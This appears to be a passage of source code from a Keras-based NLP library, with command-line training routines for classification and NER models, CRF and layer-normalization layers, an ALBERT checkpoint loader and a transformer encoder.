assert max_len is not None, 'Please specify `max_len`!'
train_generator = TFDataGenerator(max_len, train_datas, tokenizer, label2id,
batch_size=batch_size, is_bert=False)
dev_generator = TFDataGenerator(max_len, dev_datas, tokenizer, label2id,
batch_size=batch_size, is_bert=False)
train_dataset = train_generator()
dev_dataset = dev_generator()
else:
train_generator = DataGenerator(train_datas, tokenizer, label2id,
batch_size=batch_size, is_bert=False)
dev_generator = DataGenerator(dev_datas, tokenizer, label2id,
batch_size=batch_size, is_bert=False)
train_dataset = train_generator.forfit(random=True)
dev_dataset = dev_generator.forfit(random=False)
model.fit(train_dataset,
steps_per_epoch=len(train_generator),
verbose=verbose,
epochs=epoch,
validation_data=dev_dataset,
validation_steps=len(dev_generator),
callbacks=[early_stop_callback, save_checkpoint_callback])
# clear model
del model
if distribute:
del strategy
K.clear_session()
# restore model
model = BiLSTM(params).build_model(with_attention=with_attention)
if TF_KERAS or TF_VERSION > 1:
model.load_weights(os.path.join(save_dir, 'best_model.weights')).expect_partial()
else:
model.load_weights(os.path.join(save_dir, 'best_model.weights'))
# compute detail metrics
    info('finished training! start to compute detail metrics...')
infer = Infer(model, tokenizer, id2label, is_bert=False)
_, _, dev_cr = compute_detail_metrics(infer, dev_datas, use_micro=use_micro)
print('develop metrics:')
print(dev_cr)
if test_datas:
_, _, test_cr = compute_detail_metrics(infer, test_datas, use_micro=use_micro)
print('test metrics:')
print(test_cr)
# save model
info('start to save frozen')
save_frozen(model, os.path.join(save_dir, 'frozen_model'))
info('start to save label')
with open(os.path.join(save_dir, 'label2id.json'), 'w', encoding='utf-8') as writer:
json.dump(label2id, writer)
info('copy vocab')
copyfile(vocab_path, os.path.join(save_dir, 'vocab.txt'))
```
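The options above can be exercised programmatically through click's test runner. The paths below are placeholders, and the module path of the `clf` group is assumed from the file layout; no console-script name is assumed.

```python
from click.testing import CliRunner
from langml.baselines.clf.cli import clf

runner = CliRunner()
result = runner.invoke(clf, [
    'bert',
    '--backbone', 'roberta',
    '--config_path', '/path/to/bert_config.json',   # placeholder paths
    '--ckpt_path', '/path/to/bert_model.ckpt',
    '--vocab_path', '/path/to/vocab.txt',
    '--train_path', 'train.tsv',
    '--dev_path', 'dev.tsv',
    '--save_dir', 'clf_model',
    '--lowercase',
])
print(result.exit_code)
```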
#### File: baselines/ner/cli.py
```python
import os
import json
from typing import Optional
from shutil import copyfile
from langml import TF_KERAS, TF_VERSION
if TF_KERAS:
import tensorflow.keras as keras
import tensorflow.keras.backend as K
else:
import keras
import keras.backend as K
import click
from langml.log import info
from langml.tokenizer import WPTokenizer, SPTokenizer
from langml.baselines import Parameters
from langml.baselines.ner import report_detail_metrics
from langml.baselines.ner.dataloader import load_data, DataGenerator, TFDataGenerator
from langml.model import save_frozen
@click.group()
def ner():
"""ner command line tools"""
pass
@ner.command()
@click.option('--backbone', type=str, default='bert',
help='specify backbone: bert | roberta | albert')
@click.option('--epoch', type=int, default=20, help='epochs')
@click.option('--batch_size', type=int, default=32, help='batch size')
@click.option('--learning_rate', type=float, default=2e-5, help='learning rate')
@click.option('--dropout_rate', type=float, default=0.2, help='dropout rate')
@click.option('--max_len', type=int, default=512, help='max len')
@click.option('--lowercase', is_flag=True, default=False, help='do lowercase')
@click.option('--tokenizer_type', type=str, default=None,
help='specify tokenizer type from [`wordpiece`, `sentencepiece`]')
@click.option('--config_path', type=str, required=True, help='bert config path')
@click.option('--ckpt_path', type=str, required=True, help='bert checkpoint path')
@click.option('--vocab_path', type=str, required=True, help='bert vocabulary path')
@click.option('--train_path', type=str, required=True, help='train path')
@click.option('--dev_path', type=str, required=True, help='dev path')
@click.option('--test_path', type=str, default=None, help='test path')
@click.option('--save_dir', type=str, required=True, help='dir to save model')
@click.option('--early_stop', type=int, default=10, help='patience to early stop')
@click.option('--distribute', is_flag=True, default=False, help='distributed training')
@click.option('--verbose', type=int, default=2, help='0 = silent, 1 = progress bar, 2 = one line per epoch')
def bert_crf(backbone: str, epoch: int, batch_size: int, learning_rate: float,
dropout_rate: float, max_len: Optional[int], lowercase: bool,
tokenizer_type: Optional[str], config_path: str, ckpt_path: str,
vocab_path: str, train_path: str, dev_path: str, test_path: str,
save_dir: str, early_stop: int, distribute: bool, verbose: int):
from langml.baselines.ner.bert_crf import BertCRF
# check distribute
if distribute:
assert TF_KERAS, 'Please `export TF_KERAS=1` to support distributed training!'
if not os.path.exists(save_dir):
os.makedirs(save_dir)
train_datas, label2id = load_data(train_path, build_vocab=True)
id2label = {v: k for k, v in label2id.items()}
dev_datas = load_data(dev_path)
test_datas = None
if test_path is not None:
test_datas = load_data(test_path)
info(f'labels: {label2id}')
info(f'train size: {len(train_datas)}')
info(f'valid size: {len(dev_datas)}')
if test_path is not None:
info(f'test size: {len(test_datas)}')
if tokenizer_type == 'wordpiece':
tokenizer = WPTokenizer(vocab_path, lowercase=lowercase)
elif tokenizer_type == 'sentencepiece':
tokenizer = SPTokenizer(vocab_path, lowercase=lowercase)
else:
# auto deduce
if vocab_path.endswith('.txt'):
info('automatically apply `WPTokenizer`')
tokenizer = WPTokenizer(vocab_path, lowercase=lowercase)
elif vocab_path.endswith('.model'):
info('automatically apply `SPTokenizer`')
tokenizer = SPTokenizer(vocab_path, lowercase=lowercase)
else:
raise ValueError("Langml cannot deduce which tokenizer to apply, please specify `tokenizer_type` manually.") # NOQA
tokenizer.enable_truncation(max_length=max_len)
params = Parameters({
'learning_rate': learning_rate,
'dropout_rate': dropout_rate,
'tag_size': len(label2id),
'vocab_size': tokenizer.get_vocab_size(),
})
if distribute:
import tensorflow as tf
# distributed training
strategy = tf.distribute.MirroredStrategy()
with strategy.scope():
model = BertCRF(config_path, ckpt_path, params, backbone=backbone).build_model(lazy_restore=True)
else:
model = BertCRF(config_path, ckpt_path, params, backbone=backbone).build_model()
if distribute:
info('distributed training! using `TFDataGenerator`')
assert max_len is not None, 'Please specify `max_len`!'
train_generator = TFDataGenerator(train_datas, tokenizer, label2id,
batch_size=batch_size, max_len=max_len, is_bert=True)
dev_generator = TFDataGenerator(dev_datas, tokenizer, label2id,
batch_size=batch_size, max_len=max_len, is_bert=True)
train_dataset = train_generator()
dev_dataset = dev_generator()
else:
train_generator = DataGenerator(train_datas, tokenizer, label2id,
batch_size=batch_size, max_len=max_len, is_bert=True)
dev_generator = DataGenerator(dev_datas, tokenizer, label2id,
batch_size=batch_size, max_len=max_len, is_bert=True)
train_dataset = train_generator.forfit(random=True)
dev_dataset = dev_generator.forfit(random=False)
early_stop_callback = keras.callbacks.EarlyStopping(
monitor='val_viterbi_accuracy',
min_delta=1e-4,
patience=early_stop,
verbose=0,
mode='auto',
baseline=None,
restore_best_weights=True
)
save_checkpoint_callback = keras.callbacks.ModelCheckpoint(
os.path.join(save_dir, 'best_model.weights'),
save_best_only=True,
save_weights_only=True,
monitor='val_viterbi_accuracy',
mode='auto')
model.fit(train_dataset,
steps_per_epoch=len(train_generator),
validation_data=dev_dataset,
validation_steps=len(dev_generator),
verbose=verbose,
epochs=epoch,
callbacks=[early_stop_callback, save_checkpoint_callback])
# clear model
del model
if distribute:
del strategy
K.clear_session()
# restore model
model = BertCRF(config_path, ckpt_path, params, backbone=backbone).build_model()
if TF_KERAS or TF_VERSION > 1:
model.load_weights(os.path.join(save_dir, 'best_model.weights')).expect_partial()
else:
model.load_weights(os.path.join(save_dir, 'best_model.weights'))
# compute detail metrics
    info('finished training! start to compute detail metrics...')
print('develop metrics:')
dev_generator = DataGenerator(dev_datas, tokenizer, label2id,
batch_size=batch_size, max_len=max_len, is_bert=True)
report_detail_metrics(model, dev_generator.datas, id2label, is_bert=True)
if test_datas:
print('test metrics:')
test_generator = DataGenerator(test_datas, tokenizer, label2id,
batch_size=batch_size, max_len=max_len, is_bert=True)
report_detail_metrics(model, test_generator.datas, id2label, is_bert=True)
# save model
info('start to save frozen')
save_frozen(model, os.path.join(save_dir, 'frozen_model'))
info('start to save label')
with open(os.path.join(save_dir, 'label2id.json'), 'w', encoding='utf-8') as writer:
json.dump(label2id, writer)
info('copy vocab')
copyfile(vocab_path, os.path.join(save_dir, 'vocab.txt'))
@ner.command()
@click.option('--epoch', type=int, default=20, help='epochs')
@click.option('--batch_size', type=int, default=32, help='batch size')
@click.option('--learning_rate', type=float, default=1e-3, help='learning rate')
@click.option('--dropout_rate', type=float, default=0.2, help='dropout rate')
@click.option('--embedding_size', type=int, default=200, help='embedding size')
@click.option('--hidden_size', type=int, default=128, help='hidden size')
@click.option('--max_len', type=int, default=None, help='max len')
@click.option('--lowercase', is_flag=True, default=False, help='do lowercase')
@click.option('--tokenizer_type', type=str, default=None,
help='specify tokenizer type from [`wordpiece`, `sentencepiece`]')
@click.option('--vocab_path', type=str, required=True, help='vocabulary path')
@click.option('--train_path', type=str, required=True, help='train path')
@click.option('--dev_path', type=str, required=True, help='dev path')
@click.option('--test_path', type=str, default=None, help='test path')
@click.option('--save_dir', type=str, required=True, help='dir to save model')
@click.option('--early_stop', type=int, default=10, help='patience to early stop')
@click.option('--distribute', is_flag=True, default=False, help='distributed training')
@click.option('--verbose', type=int, default=2, help='0 = silent, 1 = progress bar, 2 = one line per epoch')
def lstm_crf(epoch: int, batch_size: int, learning_rate: float, dropout_rate: float,
embedding_size: int, hidden_size: int, max_len: Optional[int],
lowercase: bool, tokenizer_type: Optional[str], vocab_path: str,
train_path: str, dev_path: str, test_path: str, save_dir: str,
early_stop: int, distribute: bool, verbose: int):
from langml.baselines.ner.lstm_crf import LstmCRF
# check distribute
if distribute:
assert TF_KERAS, 'Please `export TF_KERAS=1` to support distributed training!'
if not os.path.exists(save_dir):
os.makedirs(save_dir)
train_datas, label2id = load_data(train_path, build_vocab=True)
id2label = {v: k for k, v in label2id.items()}
dev_datas = load_data(dev_path)
test_datas = None
if test_path is not None:
test_datas = load_data(test_path)
info(f'labels: {label2id}')
info(f'train size: {len(train_datas)}')
info(f'valid size: {len(dev_datas)}')
if test_path is not None:
info(f'test size: {len(test_datas)}')
if tokenizer_type == 'wordpiece':
tokenizer = WPTokenizer(vocab_path, lowercase=lowercase)
elif tokenizer_type == 'sentencepiece':
tokenizer = SPTokenizer(vocab_path, lowercase=lowercase)
else:
# auto deduce
if vocab_path.endswith('.txt'):
info('automatically apply `WPTokenizer`')
tokenizer = WPTokenizer(vocab_path, lowercase=lowercase)
elif vocab_path.endswith('.model'):
info('automatically apply `SPTokenizer`')
tokenizer = SPTokenizer(vocab_path, lowercase=lowercase)
else:
raise ValueError("Langml cannot deduce which tokenizer to apply, please specify `tokenizer_type` manually.") # NOQA
if max_len is not None:
tokenizer.enable_truncation(max_length=max_len)
params = Parameters({
'learning_rate': learning_rate,
'dropout_rate': dropout_rate,
'tag_size': len(label2id),
'vocab_size': tokenizer.get_vocab_size(),
'embedding_size': embedding_size,
'hidden_size': hidden_size
})
if distribute:
import tensorflow as tf
# distributed training
strategy = tf.distribute.MirroredStrategy()
with strategy.scope():
model = LstmCRF(params).build_model()
else:
model = LstmCRF(params).build_model()
if distribute:
info('distributed training! using `TFDataGenerator`')
assert max_len is not None, 'Please specify `max_len`!'
train_generator = TFDataGenerator(train_datas, tokenizer, label2id,
batch_size=batch_size, max_len=max_len, is_bert=False)
dev_generator = TFDataGenerator(dev_datas, tokenizer, label2id,
batch_size=batch_size, max_len=max_len, is_bert=False)
train_dataset = train_generator()
dev_dataset = dev_generator()
else:
train_generator = DataGenerator(train_datas, tokenizer, label2id,
batch_size=batch_size, max_len=max_len, is_bert=False)
dev_generator = DataGenerator(dev_datas, tokenizer, label2id,
batch_size=batch_size, max_len=max_len, is_bert=False)
train_dataset = train_generator.forfit(random=True)
dev_dataset = dev_generator.forfit(random=False)
early_stop_callback = keras.callbacks.EarlyStopping(
monitor='val_viterbi_accuracy',
min_delta=1e-4,
patience=early_stop,
verbose=0,
mode='auto',
baseline=None,
restore_best_weights=True
)
save_checkpoint_callback = keras.callbacks.ModelCheckpoint(
os.path.join(save_dir, 'best_model.weights'),
save_best_only=True,
save_weights_only=True,
monitor='val_viterbi_accuracy',
mode='auto')
model.fit(train_dataset,
steps_per_epoch=len(train_generator),
validation_data=dev_dataset,
validation_steps=len(dev_generator),
verbose=verbose,
epochs=epoch,
callbacks=[early_stop_callback, save_checkpoint_callback])
# clear model
del model
if distribute:
del strategy
K.clear_session()
# restore model
model = LstmCRF(params).build_model()
if TF_KERAS or TF_VERSION > 1:
model.load_weights(os.path.join(save_dir, 'best_model.weights')).expect_partial()
else:
model.load_weights(os.path.join(save_dir, 'best_model.weights'))
# compute detail metrics
    info('finished training! start to compute detail metrics...')
print('develop metrics:')
dev_generator = DataGenerator(dev_datas, tokenizer, label2id,
batch_size=batch_size, max_len=max_len, is_bert=False)
report_detail_metrics(model, dev_generator.datas, id2label, is_bert=False)
if test_datas:
print('test metrics:')
test_generator = DataGenerator(test_datas, tokenizer, label2id,
batch_size=batch_size, max_len=max_len, is_bert=False)
report_detail_metrics(model, test_generator.datas, id2label, is_bert=False)
# save model
info('start to save frozen')
save_frozen(model, os.path.join(save_dir, 'frozen_model'))
info('start to save label')
with open(os.path.join(save_dir, 'label2id.json'), 'w', encoding='utf-8') as writer:
json.dump(label2id, writer)
info('copy vocab')
copyfile(vocab_path, os.path.join(save_dir, 'vocab.txt'))
```
#### File: langml/layers/crf.py
```python
from typing import Optional, Callable, Union
from langml import TF_KERAS
if TF_KERAS:
import tensorflow.keras.backend as K
import tensorflow.keras.layers as L
else:
import keras.backend as K
import keras.layers as L
import tensorflow as tf
from langml.tensor_typing import Tensors
from langml.third_party.crf import crf_log_likelihood, crf_decode
class CRF(L.Layer):
def __init__(self,
output_dim: int,
sparse_target: Optional[bool] = True,
**kwargs):
"""
Args:
output_dim (int): the number of labels to tag each temporal input.
            sparse_target (bool): whether the ground-truth labels are represented as one-hot vectors.
Input shape:
(batch_size, sentence length, output_dim)
Output shape:
(batch_size, sentence length, output_dim)
Usage:
>>> from tensorflow.keras.models import Sequential
>>> from tensorflow.keras.layers import Input, Embedding, Bidirectional, LSTM, Dense
>>> num_labels = 10
>>> embedding_size = 100
>>> hidden_size = 128
>>> model = Sequential()
>>> model.add(Embedding(num_labels, embedding_size))
>>> model.add(Bidirectional(LSTM(hidden_size, return_sequences=True)))
>>> model.add(Dense(num_labels))
>>> crf = CRF(num_labels, sparse_target=True)
>>> model.add(crf)
>>> model.compile('adam', loss=crf.loss, metrics=[crf.accuracy])
"""
super(CRF, self).__init__(**kwargs)
self.support_mask = True
self.output_dim = output_dim
self.sparse_target = sparse_target
self.input_spec = L.InputSpec(min_ndim=3)
self.supports_masking = False
self.sequence_lengths = None
def build(self, input_shape: Tensors):
assert len(input_shape) == 3
f_shape = input_shape
input_spec = L.InputSpec(min_ndim=3, axes={-1: f_shape[-1]})
if f_shape[-1] is None:
raise ValueError('The last dimension of the inputs to `CRF` '
'should be defined. Found `None`.')
if f_shape[-1] != self.output_dim:
raise ValueError('The last dimension of the input shape must be equal to output'
' shape. Use a linear layer if needed.')
self.input_spec = input_spec
self.transitions = self.add_weight(name='transitions',
shape=[self.output_dim, self.output_dim],
initializer='glorot_uniform',
trainable=True)
self.built = True
def compute_mask(self,
inputs: Tensors,
mask: Optional[Tensors] = None):
return None
def call(self,
inputs: Tensors,
sequence_lengths: Optional[Tensors] = None,
training: Optional[Union[bool, int]] = None,
mask: Optional[Tensors] = None,
**kwargs) -> Tensors:
sequences = tf.convert_to_tensor(inputs, dtype=self.dtype)
if sequence_lengths is not None:
assert len(sequence_lengths.shape) == 2
assert tf.convert_to_tensor(sequence_lengths).dtype == 'int32'
seq_len_shape = tf.convert_to_tensor(sequence_lengths).get_shape().as_list()
assert seq_len_shape[1] == 1
self.sequence_lengths = K.flatten(sequence_lengths)
else:
self.sequence_lengths = tf.ones(tf.shape(inputs)[0], dtype=tf.int32) * (
tf.shape(inputs)[1]
)
viterbi_sequence, _ = crf_decode(sequences,
self.transitions,
self.sequence_lengths)
output = K.one_hot(viterbi_sequence, self.output_dim)
return K.in_train_phase(sequences, output, training=training)
@property
def loss(self) -> Callable:
def crf_loss(y_true: Tensors, y_pred: Tensors) -> Tensors:
y_true = K.argmax(y_true, 2) if self.sparse_target else y_true
y_true = K.reshape(y_true, K.shape(y_pred)[:-1])
log_likelihood, _ = crf_log_likelihood(
y_pred,
K.cast(y_true, dtype='int32'),
self.sequence_lengths,
transition_params=self.transitions,
)
return K.mean(-log_likelihood)
return crf_loss
@property
def accuracy(self) -> Callable:
def viterbi_accuracy(y_true: Tensors, y_pred: Tensors) -> Tensors:
y_true = K.argmax(y_true, 2) if self.sparse_target else y_true
y_true = K.reshape(y_true, K.shape(y_pred)[:-1])
viterbi_sequence, _ = crf_decode(
y_pred,
self.transitions,
self.sequence_lengths
)
mask = K.all(K.greater(y_pred, -1e6), axis=2)
mask = K.cast(mask, K.floatx())
y_true = K.cast(y_true, 'int32')
corrects = K.cast(K.equal(y_true, viterbi_sequence), K.floatx())
return K.sum(corrects * mask) / K.sum(mask)
return viterbi_accuracy
def compute_output_shape(self, input_shape: Tensors) -> Tensors:
tf.TensorShape(input_shape).assert_has_rank(3)
return input_shape[:2] + (self.output_dim,)
@property
def trans(self) -> Tensors:
""" transition parameters
"""
return K.eval(self.transitions)
def get_config(self) -> dict:
config = {
'output_dim': self.output_dim,
'sparse_target': self.sparse_target,
'supports_masking': self.supports_masking,
'transitions': K.eval(self.transitions)
}
base_config = super(CRF, self).get_config()
return dict(base_config, **config)
@staticmethod
def get_custom_objects() -> dict:
return {'CRF': CRF}
```
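Complementing the docstring's usage snippet, a shape sketch for the training data: with `sparse_target=True` the loss and accuracy above take `argmax` over the last axis, so `y_true` is expected to be one-hot of shape `(batch, seq_len, output_dim)`. The sizes below are arbitrary.

```python
import numpy as np

num_labels, batch, seq_len = 10, 4, 20
x = np.random.randint(1, num_labels, size=(batch, seq_len))                      # token ids
y = np.eye(num_labels)[np.random.randint(0, num_labels, size=(batch, seq_len))]  # (4, 20, 10) one-hot tags
print(x.shape, y.shape)
# model.fit(x, y, ...) with the Sequential model from the docstring above
```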
#### File: langml/layers/layer_norm.py
```python
from typing import Optional, Union
from langml import TF_KERAS
if TF_KERAS:
import tensorflow.keras as keras
import tensorflow.keras.backend as K
import tensorflow.keras.layers as L
else:
import keras
import keras.backend as K
import keras.layers as L
from langml.tensor_typing import Tensors, Initializer, Constraint, Regularizer
class LayerNorm(L.Layer):
def __init__(self,
center: Optional[bool] = True,
scale: Optional[bool] = True,
epsilon: Optional[float] = 1e-7,
gamma_initializer: Optional[Initializer] = 'ones',
gamma_regularizer: Optional[Regularizer] = None,
gamma_constraint: Optional[Constraint] = None,
beta_initializer: Optional[Initializer] = 'zeros',
beta_regularizer: Optional[Regularizer] = None,
beta_constraint: Optional[Constraint] = None,
**kwargs):
super(LayerNorm, self).__init__(**kwargs)
self.supports_masking = True
self.center = center
self.scale = scale
self.epsilon = epsilon
self.gamma_initializer = keras.initializers.get(gamma_initializer)
self.gamma_regularizer = keras.regularizers.get(gamma_regularizer)
self.gamma_constraint = keras.constraints.get(gamma_constraint)
self.beta_initializer = keras.initializers.get(beta_initializer)
self.beta_regularizer = keras.regularizers.get(beta_regularizer)
self.beta_constraint = keras.constraints.get(beta_constraint)
def get_config(self) -> dict:
config = {
"center": self.center,
"scale": self.scale,
"epsilon": self.epsilon,
"gamma_initializer": keras.initializers.serialize(self.gamma_initializer),
"gamma_regularizer": keras.regularizers.serialize(self.gamma_regularizer),
"gamma_constraint": keras.constraints.serialize(self.gamma_constraint),
"beta_initializer": keras.initializers.serialize(self.beta_initializer),
"beta_regularizer": keras.regularizers.serialize(self.beta_regularizer),
"beta_constraint": keras.constraints.serialize(self.beta_constraint)
}
base_config = super(LayerNorm, self).get_config()
return dict(base_config, **config)
def build(self, input_shape: Tensors):
shape = input_shape[-1:]
if self.scale:
self.gamma = self.add_weight(
shape=shape,
initializer=self.gamma_initializer,
regularizer=self.gamma_regularizer,
constraint=self.gamma_constraint,
name='gamma',
)
if self.center:
self.beta = self.add_weight(
shape=shape,
initializer=self.beta_initializer,
regularizer=self.beta_regularizer,
constraint=self.beta_constraint,
name='beta',
)
super(LayerNorm, self).build(input_shape)
def call(self, inputs: Tensors, **kwargs) -> Tensors:
# layer norm: specify axis=-1
mean = K.mean(inputs, axis=-1, keepdims=True)
        variance = K.mean(K.square(inputs - mean), axis=-1, keepdims=True)  # centered variance, consistent with the normalization below
std = K.sqrt(variance + self.epsilon)
# standard normalization: x = (x - \mu) / \std
outputs = (inputs - mean) / std
if self.scale:
outputs *= self.gamma
if self.center:
outputs += self.beta
return outputs
def compute_mask(self,
inputs: Tensors,
mask: Optional[Tensors] = None) -> Union[Tensors, None]:
return mask
@staticmethod
def get_custom_objects() -> dict:
return {'LayerNorm': LayerNorm}
def compute_output_shape(self, input_shape: Tensors) -> Tensors:
return input_shape
```
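A small numeric check of the layer against a manual numpy computation, consistent with the centered-variance computation in `call` (assumes a working Keras backend; the tolerance is loose because of `epsilon`):

```python
import numpy as np
from langml import K
from langml.layers import LayerNorm

x = np.random.randn(2, 3, 8).astype('float32')
layer = LayerNorm()
out = K.eval(layer(K.constant(x)))

mu = x.mean(axis=-1, keepdims=True)
std = np.sqrt(((x - mu) ** 2).mean(axis=-1, keepdims=True) + 1e-7)
print(np.allclose(out, (x - mu) / std, atol=1e-4))   # should print True for the implementation above
```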
#### File: langml/plm/albert.py
```python
import json
from typing import Callable, Optional, Tuple, Union
import numpy as np
from langml.tensor_typing import Models
from langml.plm import load_variables
from langml.plm.bert import BERT
def load_albert(config_path: str,
checkpoint_path: str,
seq_len: Optional[int] = None,
pretraining: bool = False,
with_mlm: bool = True,
with_nsp: bool = True,
lazy_restore: bool = False,
weight_prefix: Optional[str] = None,
dropout_rate: float = 0.0,
**kwargs) -> Union[Tuple[Models, Callable], Tuple[Models, Callable, Callable]]:
""" Load pretrained ALBERT
Args:
- config_path: str, path of albert config
- checkpoint_path: str, path of albert checkpoint
- seq_len: Optional[int], specify fixed input sequence length, default None
- pretraining: bool, pretraining mode, default False
- with_mlm: bool, whether to use mlm task in pretraining, default True
- with_nsp: bool, whether to use nsp/sop task in pretraining, default True
- lazy_restore: bool, whether to restore pretrained weights lazily, default False.
Set it as True for distributed training.
- weight_prefix: Optional[str], prefix name of weights, default None.
You can set a prefix name in unshared siamese networks.
- dropout_rate: float, dropout rate, default 0.
Return:
- model: keras model
- bert: bert instance
        - restore: weight-restore callback, only returned when lazy_restore=True
"""
# initialize model from config
with open(config_path, 'r') as reader:
config = json.load(reader)
if seq_len is not None:
config['max_position_embeddings'] = min(seq_len, config['max_position_embeddings'])
bert = BERT(
config['vocab_size'],
position_size=config['max_position_embeddings'],
seq_len=seq_len,
embedding_dim=config.get('embedding_size') or config.get('hidden_size'),
hidden_dim=config.get('hidden_size'),
transformer_blocks=config['num_hidden_layers'],
attention_heads=config['num_attention_heads'],
intermediate_size=config['intermediate_size'],
feed_forward_activation=config['hidden_act'],
initializer_range=config['initializer_range'],
dropout_rate=dropout_rate or config.get('hidden_dropout_prob', 0.0),
pretraining=pretraining,
share_weights=True,
weight_prefix=weight_prefix,
**kwargs)
bert.build()
model = bert(with_mlm=with_mlm, with_nsp=with_nsp)
def restore(model):
variables = load_variables(checkpoint_path)
model.get_layer(name=bert.get_weight_name('Embedding-Token')).set_weights([
variables('bert/embeddings/word_embeddings'),
])
model.get_layer(name=bert.get_weight_name('Embedding-Position')).set_weights([
variables('bert/embeddings/position_embeddings')[:config['max_position_embeddings'], :],
])
model.get_layer(name=bert.get_weight_name('Embedding-Segment')).set_weights([
variables('bert/embeddings/token_type_embeddings'),
])
model.get_layer(name=bert.get_weight_name('Embedding-Norm')).set_weights([
variables('bert/embeddings/LayerNorm/gamma'),
variables('bert/embeddings/LayerNorm/beta'),
])
model.get_layer(name=bert.get_weight_name('Embedding-Mapping')).set_weights([
variables('bert/encoder/embedding_hidden_mapping_in/kernel'),
variables('bert/encoder/embedding_hidden_mapping_in/bias'),
])
        # The following weights are shared across all transformer blocks (ALBERT parameter sharing)
model.get_layer(name=bert.get_weight_name('Transformer-MultiHeadSelfAttention')).set_weights([
variables('bert/encoder/transformer/group_0/inner_group_0/attention_1/self/query/kernel'),
variables('bert/encoder/transformer/group_0/inner_group_0/attention_1/self/key/kernel'),
variables('bert/encoder/transformer/group_0/inner_group_0/attention_1/self/value/kernel'),
variables('bert/encoder/transformer/group_0/inner_group_0/attention_1/output/dense/kernel'),
variables('bert/encoder/transformer/group_0/inner_group_0/attention_1/self/query/bias'),
variables('bert/encoder/transformer/group_0/inner_group_0/attention_1/self/key/bias'),
variables('bert/encoder/transformer/group_0/inner_group_0/attention_1/self/value/bias'),
variables('bert/encoder/transformer/group_0/inner_group_0/attention_1/output/dense/bias'),
])
model.get_layer(name=bert.get_weight_name('Transformer-MultiHeadSelfAttention-Norm')).set_weights([
variables('bert/encoder/transformer/group_0/inner_group_0/LayerNorm/gamma'),
variables('bert/encoder/transformer/group_0/inner_group_0/LayerNorm/beta'),
])
model.get_layer(name=bert.get_weight_name('Transformer-FeedForward')).set_weights([
variables('bert/encoder/transformer/group_0/inner_group_0/ffn_1/intermediate/dense/kernel'),
variables('bert/encoder/transformer/group_0/inner_group_0/ffn_1/intermediate/output/dense/kernel'),
variables('bert/encoder/transformer/group_0/inner_group_0/ffn_1/intermediate/dense/bias'),
variables('bert/encoder/transformer/group_0/inner_group_0/ffn_1/intermediate/output/dense/bias'),
])
model.get_layer(name=bert.get_weight_name('Transformer-FeedForward-Norm')).set_weights([
variables('bert/encoder/transformer/group_0/inner_group_0/LayerNorm_1/gamma'),
variables('bert/encoder/transformer/group_0/inner_group_0/LayerNorm_1/beta'),
])
if pretraining:
if with_mlm:
model.get_layer(name=bert.get_weight_name('MLM-Dense')).set_weights([
variables('cls/predictions/transform/dense/kernel'),
variables('cls/predictions/transform/dense/bias'),
])
model.get_layer(name=bert.get_weight_name('MLM-Norm')).set_weights([
variables('cls/predictions/transform/LayerNorm/gamma'),
variables('cls/predictions/transform/LayerNorm/beta'),
])
model.get_layer(name=bert.get_weight_name('MLM-Match')).set_weights([
variables('cls/predictions/output_bias'),
])
if with_nsp:
model.get_layer(name=bert.get_weight_name('NSP-Dense')).set_weights([
variables('bert/pooler/dense/kernel'),
variables('bert/pooler/dense/bias'),
])
model.get_layer(name=bert.get_weight_name('NSP')).set_weights([
np.transpose(variables('cls/seq_relationship/output_weights')),
variables('cls/seq_relationship/output_bias'),
])
return model
if lazy_restore:
return model, bert, restore
model = restore(model)
return model, bert
```
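A minimal usage sketch of `load_albert` as defined above; the import path and the config/checkpoint locations are assumptions and must point at a real ALBERT release for this to run.
```python
# Hypothetical usage of load_albert; paths and the module import path are assumptions.
from langml.plm.albert import load_albert  # import path assumed from the package layout

model, bert, restore = load_albert(
    config_path='albert_base/albert_config.json',   # placeholder path
    checkpoint_path='albert_base/model.ckpt-best',  # placeholder path
    seq_len=128,
    lazy_restore=True,   # also return the restore callback instead of applying it eagerly
)
restore(model)           # load the pretrained weights when convenient (e.g. after distribution setup)
model.summary()
```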
#### File: langml/transformer/encoder.py
```python
from typing import Optional, Union
from langml import TF_KERAS
if TF_KERAS:
import tensorflow.keras.layers as L
else:
import keras.layers as L
from langml.layers import MultiHeadAttention, LayerNorm
from langml.tensor_typing import Tensors, Activation
from langml.transformer import gelu, FeedForward
class TransformerEncoder:
def __init__(self,
attention_heads: int,
hidden_dim: int,
attention_activation: Optional[Union[str, Activation]] = None,
feed_forward_activation: Optional[Union[str, Activation]] = gelu,
dropout_rate: float = 0.0,
trainable: Optional[bool] = True,
name: Optional[str] = 'Transformer-Encoder'):
self.name = name
self.dropout_rate = dropout_rate
self.multihead_layer = MultiHeadAttention(head_num=attention_heads,
return_attention=False,
attention_activation=attention_activation,
history_only=False,
trainable=trainable,
name=f'{self.name}-MultiHeadSelfAttention')
if dropout_rate > 0.0:
self.attn_dropout_layer = L.Dropout(rate=dropout_rate, name=f'{self.name}-MultiHeadSelfAttention-Dropout')
self.attn_residual_layer = L.Add(name=f'{self.name}-MultiHeadSelfAttention-Add')
self.attn_layer_norm = LayerNorm(name=f'{self.name}-MultiHeadSelfAttention-Norm', trainable=trainable)
self.ffn_layer = FeedForward(hidden_dim,
activation=feed_forward_activation,
name=f'{self.name}-FeedForward')
if dropout_rate > 0.0:
self.ffn_dropout_layer = L.Dropout(rate=dropout_rate, name=f'{self.name}-FeedForward-Dropout')
self.ffn_residual_layer = L.Add(name=f'{self.name}-FeedForward-Add')
self.ffn_layer_norm = LayerNorm(name=f'{self.name}-FeedForward-Norm', trainable=trainable)
def __call__(self, inputs: Tensors) -> Tensors:
attn_output = self.multihead_layer(inputs)
if self.dropout_rate > 0.0:
attn_output = self.attn_dropout_layer(attn_output)
if isinstance(inputs, list):
inputs = inputs[0]
attn_output = self.attn_residual_layer([inputs, attn_output])
attn_output = self.attn_layer_norm(attn_output)
ffn_output = self.ffn_layer(attn_output)
if self.dropout_rate > 0.0:
ffn_output = self.ffn_dropout_layer(ffn_output)
ffn_output = self.ffn_residual_layer([attn_output, ffn_output])
ffn_output = self.ffn_layer_norm(ffn_output)
return ffn_output
class TransformerEncoderBlock:
def __init__(self,
blocks: int,
attention_heads: int,
hidden_dim: int,
attention_activation: Optional[Union[str, Activation]] = None,
feed_forward_activation: Optional[Union[str, Activation]] = gelu,
dropout_rate: float = 0.0,
trainable: Optional[bool] = False,
name: Optional[str] = 'TransformerEncoderBlock',
share_weights: bool = False):
if share_weights:
encoder = TransformerEncoder(attention_heads,
hidden_dim,
attention_activation=attention_activation,
feed_forward_activation=feed_forward_activation,
dropout_rate=dropout_rate,
trainable=trainable,
name=name)
self.encoders = [encoder for _ in range(blocks)]
else:
